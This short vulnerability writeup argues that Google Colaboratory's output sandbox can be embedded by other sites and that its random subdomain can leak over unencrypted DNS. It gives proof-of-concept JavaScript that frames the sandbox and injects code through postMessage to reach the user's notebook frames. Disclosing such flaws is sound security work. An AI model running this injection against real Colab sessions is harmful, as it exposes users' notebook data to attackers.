Writeups

Google Colaboratory puts some output such as visualizations into a sandbox however it has no embedding protection such as csp frame-ancestors so the origin is exposed to attackers with local network access.

let w = open('about:blank');

On about:blank

opener.location = 'https://colab.research.google.com/';

Leak ID from unencrypted DNS then do:

let IDfromDNS = 'blah';
let f = document.createElement('iframe');
f.hidden = true;
f.src =
  'https://' + IDfromDNS + '-0-colab.googleusercontent.com/outputframe.html';
document.body.appendChild(f);
setTimeout((_) => {
  f.contentWindow.postMessage(
    {sandboxed_iframe_evaluation: 'console.log(parent.opener[0].google)'},
    '*'
  );
}, 100);

On the “Welcome to Colaboratory” project using the sandbox embedded on the attackers website.

• parent.opener[0].google refers to stuff.
• parent.opener[5].document refers to the chart.

Sometimes sandboxes use a randomly generated subdomain for isolation unfortunately due to unencrypted DNS this is not safe. https://www.cloudflare.com/learning/dns/dns-over-tls/

Improve this page default basic random dark inverted cmd.exe comic base64 Minecraft flip 🦆 rainbow text typoifier AI audio spoof NoScript